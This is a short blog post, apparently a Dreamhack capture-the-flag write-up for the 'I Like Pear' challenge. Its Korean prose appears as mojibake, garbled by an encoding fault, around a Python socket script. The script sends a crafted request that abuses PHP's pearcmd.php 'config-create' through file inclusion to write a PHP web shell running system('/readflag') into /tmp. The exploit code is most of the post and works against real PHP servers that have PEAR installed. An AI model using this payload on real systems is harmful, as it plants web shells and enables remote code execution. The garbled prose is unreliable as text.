I Like Pear ๐Ÿ

chwrldยท2025๋…„ 1์›” 18์ผ
0

dreamhack

๋ชฉ๋ก ๋ณด๊ธฐ
21/21

์›น ์†Œ์ผ“

์œผ๋กœ ์š”์ฒญ์„ ๋ณด๋‚ด์•ผ ๋˜๋Š”๊ฒƒ ๊ฐ™๋‹ค.

๊ทธ๋ƒฅ ๋ธŒ๋ผ์šฐ์ €๋‚˜ POSTMAN์œผ๋กœ ์š”์ฒญ์„ ๋ณด๋‚ด๋ฉด ์ธ์ฝ”๋”ฉ ๋ฌธ์ œ ๋•Œ๋ฌธ์ธ์ง€ ๋ฌด์Šจ ๋ฌธ์ œ ๋•Œ๋ฌธ์ธ์ง€ ๋ชฐ๋ผ๋„ ์ œ๋Œ€๋กœ ๋˜์ง€ ์•Š๋Š”๋‹ค.

์•„๋ฌดํŠผ ์›น ์†Œ์ผ“์œผ๋กœ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์งœ์„œ ๋ณด๋‚ด๋ฉด ๋œ๋‹ค.

import socket

# ์„œ๋ฒ„์™€์˜ ์†Œ์ผ“ ์—ฐ๊ฒฐ ์„ค์ •
host = 'host1.dreamhack.games'  # ์—ฐ๊ฒฐํ•  ์„œ๋ฒ„์˜ ํ˜ธ์ŠคํŠธ๋ช… ๋˜๋Š” IP
port = 17169  # HTTP ๊ธฐ๋ณธ ํฌํŠธ (80)

# ์†Œ์ผ“ ์ƒ์„ฑ ๋ฐ ์„œ๋ฒ„์— ์—ฐ๊ฒฐ
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# HTTP ์š”์ฒญ ์ž‘์„ฑ
request = (
    "GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?system('/readflag')?>+/tmp/index111.php HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# ์š”์ฒญ ๋ณด๋‚ด๊ธฐ
s.send(request.encode())

# ์„œ๋ฒ„ ์‘๋‹ต ์ฝ๊ธฐ
response = s.recv(9999999)
print(response.decode())

# ์†Œ์ผ“ ์—ฐ๊ฒฐ ์ข…๋ฃŒ
s.close()
profile
BoB 13th ์ตœ๊ฐ•ํฌ๋ฆฐ์ด๐Ÿ‘ฎ

0๊ฐœ์˜ ๋Œ“๊ธ€